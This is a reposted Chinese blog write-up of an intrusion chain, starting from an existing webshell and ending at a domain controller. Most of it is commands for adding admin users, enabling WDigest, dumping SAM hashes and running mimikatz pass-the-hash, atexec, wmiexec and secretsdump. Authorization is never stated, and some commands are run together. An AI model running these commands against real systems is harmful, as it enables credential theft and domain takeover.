webshell到域控
2024-5-11 18:36:16 Author: mp.weixin.qq.com(查看原文) 阅读量:2 收藏

欢迎转发,请勿抄袭

        分享一次与同事的实战经历

一、前言

    同事发来一个url,发现该站点存在任意文件读取,并被人留下了webshell,直接连接就行了。开局就是webshell

二、机器信息收集

    1、连接webshell后,发现当前是一个域管理员权限。

    2、目标存在域

net time /domain

     3、存在杀软

tasklist /svc 

三、失败的远程桌面登陆

        1、直接通过终端,添加用户。并添加到管理组。

net user user passwd /addnet localgroup administrators user /add

        2、发现远程默认端口被改。

执行命令 tasklist /svc | find "Ter",本例中查看到 TermService 的 PID 是 1592执行命令 netstat -ano | find "xxx",查看 TermService 使用的端口,如示例中的 3389

        3、尝试连接发现连接一直连接不上。

        4、尝试wmiexec登陆

python wmiexec.py user:passwd@ip

四、奇怪的用户文件夹

    1、通过查看用户列表,发现一共7个本地用户。

net user

    2、与之对应的用户配置文件却只有2个。

五、凭证收集

    1、尝试本地凭证导出

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /freg save hklm\sam e:\test\sam.hivereg save hklm\system e:\test\system.hive

    失败!

    2、上传各种内存凭证导出工具,均以失败告终!

六、不起眼的提示

    1、将本地凭证导出工具上传到c盘时的提示

        那么可以判断出,前面用户登陆不了远程桌面的问题跟这个有关,于是将一些多年前且无用的文件清理。

七、再次导出本地凭证

    1、上传工具quarkpwdump.exe。通过终端命令执行导出。

QuarksPwDump.exe  --dump-hash-local


    2、通过ntlm登陆远程桌面

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /fprivilege::debugsekurlsa::pth /user:administrator /domain:. /ntlm:ntlm值 "/run:mstsc.exe /restrictedadmin

3、上线cs,导出内存凭证

4、验证域管hash

atexec.exe -hashes :ntlm 域/域管用户名@ip whoami

八、进击域控

1、寻找域控ip地址

net group "domain controllers" /domain 查找域管理器,再ping即可得到域控ip

2、使用smb管道登陆

python3 wmiexec.py -hashes :ntlm 域名称/administrator@域控ip

发现登陆失败,猜测杀软拦截了。

3、尝试将ntlm解密,奈何解不了。

4、尝试导出所有的hash

python3 secretsdump.py -hashes :ntlm 域名称/administrator@域控ip -dc-ip 域控ip

5、找到域管用户

net group "domain admins" /domain

6、将这三个域管用户ntlm进行解密,最终解出一个,登陆域控。

总结:开局就是webshell。

文章声明:文章涉及到的工具、及教程仅供学习参考,请勿非法使用。否则与作者无关!

如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放

往期回顾

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247494593&idx=1&sn=d13d5e032650c040018c74feb7a49aee&chksm=e8a5e1a2dfd268b47eb5cff0b2cd52eece6092e713c6fcde78fd1f8f9ed45d338cb08808cf86&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh